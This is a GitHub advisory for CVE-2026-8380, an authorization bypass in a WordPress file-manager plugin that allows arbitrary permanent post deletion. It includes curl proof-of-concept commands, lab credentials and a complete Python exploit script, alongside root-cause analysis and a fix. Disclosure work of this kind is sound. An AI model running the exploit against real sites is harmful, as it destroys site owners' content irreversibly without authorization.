GitHub: tiagob0b/CVE-2026-8380
# CVE-2026-8380 — Frontend File Manager <= 23.6 Arbitrary Post Deletion
## Overview
A critical authorization flaw was identified in the WordPress plugin **Frontend File Manager (nmedia-user-file-uploader)** affecting versions `<= 23.6`.
The vulnerability allows authenticated users with low privileges to permanently delete arbitrary WordPress posts, pages, attachments, and custom post types due to improper authorization validation in the AJAX deletion endpoint.
When the plugin option `_allow_guest_upload=yes` is enabled, the vulnerability becomes exploitable by unauthenticated attackers.
* **CVE:** CVE-2026-8380
* **Plugin:** Frontend File Manager (`nmedia-user-file-uploader`)
* **Affected Versions:** <= 23.6
* **Researcher:** Tiago Ferreira
* **CWE:** CWE-639 / CWE-862
* **Vulnerability Type:** Arbitrary Post Deletion
* **WPScan:** https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/
# Executive Summary
The plugin contains a critical authorization bypass that allows arbitrary deletion of WordPress content: inside the `wpfm_delete_file` AJAX action, the ownership check and the deletion loop read different request parameters, so the check never covers the IDs that are actually deleted.
The vulnerability was successfully validated in a controlled laboratory environment with active Proof-of-Concept exploitation.
Additional security weaknesses were also identified during the research:
* CSRF in metadata update endpoints without nonce validation
* Extension allowlist bypass based only on the last file extension
* `_allow_guest_upload` disabling authorization checks in multiple endpoints
* Rate limiting based only on `REMOTE_ADDR`
# Vulnerable Endpoint
```http
POST /wp-admin/admin-ajax.php?action=wpfm_delete_file
```
### Affected File
inc/files.php
### Vulnerable Code Region
```php
// inc/files.php:691
// $allow_guest reflects the _allow_guest_upload option; when it is true the
// ownership check is skipped entirely. Only the singular file_id is checked.
if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
    wp_send_json_error(__("Sorry, not allowed", "wpfm"));
}

// inc/files.php:695
// The deletion loop iterates over the separate file_ids[] array, which the
// check above never looked at. No post_type check is performed either.
$file_ids = isset($_POST['file_ids']) && is_array($_POST['file_ids'])
    ? array_map('intval', $_POST['file_ids']) : [];
foreach ($file_ids as $file_id) {
    $file = new WPFM_File($file_id);
    wp_delete_post($file_id, $bypass_trash); // $bypass_trash is true here: no Trash
}
```
# Root Cause
The authorization check validates ownership using only the singular request parameter `file_id`:

```php
$_POST['file_id']
```

However, the actual deletion operation iterates over a different parameter, the array sent as `file_ids[]`:

```php
$_POST['file_ids']
```
Because of this mismatch, an attacker can:
1. Provide a legitimate owned post in `file_id`
2. Inject arbitrary victim post IDs into `file_ids[]`
No validation exists to ensure:
* ownership of every item in `file_ids[]`
* allowed `post_type`
* relationship between `file_id` and `file_ids[]`
As a result, arbitrary WordPress content can be permanently deleted.
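To make the mismatch concrete, here is an added Python model of the handler's authorization logic. It is not the plugin's code and not part of the original advisory; it re-expresses the PHP excerpt above so the `file_id` / `file_ids[]` mismatch can be exercised offline. `vulnerable_delete` mirrors the excerpt (including the `_allow_guest_upload` short-circuit), `hardened_delete` checks every entry of `file_ids[]` the way the fix section of this advisory calls for. The post table is constructed for the example and mirrors the lab setup on this page; the post type name `wpfm-files` is an assumption taken from the fix section.

```python
# Added example: a Python model of the wpfm_delete_file authorization logic.
# This is NOT the plugin's code; it re-expresses the PHP excerpt above so the
# file_id / file_ids[] mismatch can be exercised offline. The post table is
# constructed for the example and mirrors the lab setup on this page.
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed post table: post_id -> (author_login, post_type).
POSTS: Dict[int, Tuple[str, str]] = {
    57: ("wpfm_sub", "wpfm-files"),  # subscriber-owned plugin file record
    60: ("admin", "page"),           # victim page
    61: ("admin", "post"),           # victim post
}

# Assumed name of the plugin's file post type (taken from the fix section of
# this advisory; verify against the installed plugin before relying on it).
FILE_POST_TYPE = "wpfm-files"


@dataclass
class Result:
    allowed: bool
    error: str = ""
    deleted: List[int] = field(default_factory=list)


def is_current_user_post_author(posts, user: Optional[str], post_id: int) -> bool:
    """Stand-in for wpfm_is_current_user_post_author(): true only when the
    post exists and its author is the logged-in user."""
    post = posts.get(post_id)
    return user is not None and post is not None and post[0] == user


def vulnerable_delete(posts, user, request, allow_guest=False):
    """Mirrors inc/files.php: the ownership check looks at the singular
    file_id, the loop deletes every entry of file_ids[]. Returns the Result
    and the post table as it looks afterwards."""
    posts = dict(posts)  # copy so callers can rerun scenarios
    file_id = int(request.get("file_id", 0))
    if not allow_guest and not is_current_user_post_author(posts, user, file_id):
        return Result(False, "Sorry, not allowed"), posts
    file_ids = [int(x) for x in request.get("file_ids", [])]  # array_map('intval', ...)
    deleted = []
    for fid in file_ids:
        if fid in posts:  # wp_delete_post($fid, true): permanent, no Trash
            del posts[fid]
            deleted.append(fid)
    return Result(True, deleted=deleted), posts


def hardened_delete(posts, user, request):
    """Every entry of file_ids[] must be owned by the caller and be a plugin
    file record; nothing is deleted if any entry fails. The guest toggle is
    deliberately not consulted here."""
    posts = dict(posts)
    file_ids = list(dict.fromkeys(int(x) for x in request.get("file_ids", [])))
    for fid in file_ids:
        if not is_current_user_post_author(posts, user, fid):
            return Result(False, "Sorry, not allowed"), posts
        if posts[fid][1] != FILE_POST_TYPE:
            return Result(False, "Sorry, not allowed"), posts
    for fid in file_ids:
        del posts[fid]
    return Result(True, deleted=file_ids), posts


if __name__ == "__main__":
    attack = {"file_id": "57", "file_ids": ["60", "61"]}
    r, left = vulnerable_delete(POSTS, "wpfm_sub", attack)
    print("vulnerable, subscriber:", r, sorted(left))
    r, left = vulnerable_delete(POSTS, None, {"file_ids": ["60"]}, allow_guest=True)
    print("vulnerable, guest upload on, unauthenticated:", r, sorted(left))
    r, left = hardened_delete(POSTS, "wpfm_sub", attack)
    print("hardened, subscriber:", r, sorted(left))
```

Running it shows the subscriber's request with `file_id=57` passing the vulnerable check and removing posts 60 and 61, the same request with no user at all succeeding once `allow_guest` is set, and the hardened variant refusing the request while leaving the table untouched.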
# Impact
An authenticated user with minimal privileges can permanently delete:
* Posts
* Pages
* Products
* Attachments
* Custom Post Types
* Plugin-specific content
The deletion is performed with `$bypass_trash` set to `true`:

```php
wp_delete_post($file_id, true);
```

meaning content is permanently removed, with no Trash recovery.
If `_allow_guest_upload=yes` is enabled:
* exploitation becomes unauthenticated
* the author ownership check is entirely skipped
# Proof of Concept
## Laboratory Environment
* Target: `192.168.1.1:8080`
* Attacker Role: Subscriber
* Victim Role: Administrator
### Attacker Account
wpfm_sub : Sub@Test123
### Victim Posts
Page ID: 60
Post ID: 61
## Step 1 — Obtain Nonce
The attacker visits a page containing the shortcode:
[ffmwp]
Extract the nonce from the rendered page (`sub_cookie` holds the subscriber's session cookie):

```bash
curl -b sub_cookie http://target/wpfm-test/ | grep wpfm_ajax_nonce
```

Response:

```
value="9c233d4720"
```
## Step 2 — Trigger Arbitrary Deletion
```bash
curl -b sub_cookie -X POST http://target/wp-admin/admin-ajax.php \
  --data 'action=wpfm_delete_file' \
  --data 'wpfm_ajax_nonce=9c233d4720' \
  --data 'file_id=57' \
  --data 'file_ids[]=60' \
  --data 'file_ids[]=61'
```
### Explanation
| Parameter | Description |
| --------------- | -------------------------------------------------- |
| `file_id=57` | Subscriber-owned post used to bypass authorization |
| `file_ids[]=60` | Victim administrator page |
| `file_ids[]=61` | Victim administrator post |
## Successful Response
```json
{
  "success": true,
  "data": {
    "message": "2 files, directories are removed inside SUB-OWNED"
  }
}
```
## Verification
```bash
curl -o /dev/null -w "%{http_code}\n" \
  http://target/wp-json/wp/v2/pages/60
```

```
404
```

```bash
curl -o /dev/null -w "%{http_code}\n" \
  http://target/wp-json/wp/v2/posts/61
```

```
404
```
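The three steps above (nonce extraction, the `admin-ajax.php` call, REST verification) as a single standard-library Python script. This is an added example, not a tool from the original advisory. The nonce field markup in `SAMPLE_HTML` is a constructed sample: only the `wpfm_ajax_nonce` name and the `value="..."` part come from the page, the surrounding attributes are assumed. The cookie is passed as a raw `Cookie` header string rather than curl's `-b` jar, and the `/wpfm-test/` path and IDs 57/60/61 are the lab values from this page. The pure helpers are separated from the network calls so they can be checked without a target.

```python
# Added example, not from the original advisory: the lab procedure (nonce
# extraction, admin-ajax deletion, REST verification) as one Python script.
# SAMPLE_HTML is a constructed sample of the shortcode page's nonce field; the
# attribute layout around value="..." is assumed, not taken from the plugin.
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import List, Optional, Sequence, Tuple

SAMPLE_HTML = (
    '<form><input type="hidden" name="wpfm_ajax_nonce" '
    'id="wpfm_ajax_nonce" value="9c233d4720" /></form>'
)

# WordPress nonces are 10 hex characters; anchoring on the field name keeps an
# unrelated value="..." elsewhere on the page from being picked up.
NONCE_RE = re.compile(r'wpfm_ajax_nonce[^>]*?value="([0-9a-f]{10})"')


def extract_nonce(html: str) -> Optional[str]:
    """Step 1: pull the AJAX nonce out of the page that renders [ffmwp]."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def build_delete_body(nonce: str, targets: Sequence[int], owned_id: Optional[int]) -> bytes:
    """Step 2: form body for action=wpfm_delete_file. owned_id goes into the only
    parameter the handler checks (file_id); targets go into file_ids[], which is
    what actually gets deleted. With _allow_guest_upload=yes the check is
    skipped entirely, so owned_id may be None and no cookie is needed."""
    fields: List[Tuple[str, str]] = [("action", "wpfm_delete_file"), ("wpfm_ajax_nonce", nonce)]
    if owned_id is not None:
        fields.append(("file_id", str(owned_id)))
    fields += [("file_ids[]", str(t)) for t in targets]
    return urllib.parse.urlencode(fields).encode()


def decode_body(body: bytes) -> dict:
    """Decode a form body back into {name: [values]} (for inspection/tests)."""
    return urllib.parse.parse_qs(body.decode())


def rest_route(post_type: str, post_id: int) -> str:
    """Verification route: core exposes pages and posts under wp/v2."""
    collection = {"page": "pages", "post": "posts"}[post_type]
    return f"/wp-json/wp/v2/{collection}/{post_id}"


def was_deleted(status: int) -> bool:
    """A permanently deleted post answers 404 on its REST route."""
    return status == 404


def fetch(url: str, data: Optional[bytes] = None, cookie: Optional[str] = None) -> Tuple[int, str]:
    req = urllib.request.Request(url, data=data, method="POST" if data else "GET")
    if data:
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def run(base: str, cookie: Optional[str], owned_id: Optional[int],
        targets: List[Tuple[str, int]]) -> List[bool]:
    """End-to-end against a lab target you are authorised to test."""
    _, html = fetch(base + "/wpfm-test/", cookie=cookie)
    nonce = extract_nonce(html)
    if nonce is None:
        raise SystemExit("nonce not found; is the [ffmwp] shortcode on that page?")
    body = build_delete_body(nonce, [pid for _, pid in targets], owned_id)
    status, text = fetch(base + "/wp-admin/admin-ajax.php", data=body, cookie=cookie)
    print(status, text)
    return [was_deleted(fetch(base + rest_route(t, pid))[0]) for t, pid in targets]


if __name__ == "__main__":
    # usage: poc.py http://target "wordpress_logged_in_...=..." 57 page:60 post:61
    # guest-upload variant (no cookie, no owned id): poc.py http://target "" "" page:60
    base, cookie, owned = sys.argv[1], sys.argv[2] or None, sys.argv[3]
    pairs = [(t, int(i)) for t, i in (arg.split(":") for arg in sys.argv[4:])]
    print(run(base, cookie, int(owned) if owned else None, pairs))
```

Each `True` in the returned list corresponds to a target that now answers 404, matching the manual verification above; a `False` means the post is still present, which is what a patched plugin should produce.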
# Severity
## Authenticated Scenario
### CVSS 3.1
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
## Guest Upload Enabled Scenario
### CVSS 3.1
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
# CWE Classification
* CWE-639 — Authorization Bypass Through User-Controlled Key
* CWE-862 — Missing Authorization
# Recommended Fix
Validate ownership and post type for every entry inside `file_ids[]`, and do not let `_allow_guest_upload` skip that validation.
Example secure implementation (`$file_ids` is the `array_map('intval', ...)` array built in the vulnerable code above; `wpfm-files` is the post type assumed for the plugin's file records):

```php
foreach ($file_ids as $fid) {
    // Each ID to be deleted must belong to the current user ...
    if ( ! wpfm_is_current_user_post_author($fid) ) {
        wp_send_json_error(__("Sorry, not allowed", "wpfm"));
    }
    // ... and must be a plugin file record, never a page, post or attachment.
    if ( get_post_type($fid) !== 'wpfm-files' ) {
        wp_send_json_error(__("Sorry, not allowed", "wpfm"));
    }
}
```
# Timeline
| Event | Date |
| ------------------------ | ---------- |
| Vulnerability Discovered | 2026-05-28 |
| Vendor Contacted | 2026-05-28 |
| WPScan Published | 2026-06-04 |
| Public Disclosure | 2026-06-18 |
# References
* WPScan Advisory:
https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/
* CVE:
https://www.cve.org/CVERecord?id=CVE-2026-8380
# Disclaimer
This research was performed in a controlled laboratory environment for educational and security research purposes only.
Do not test systems without proper authorization.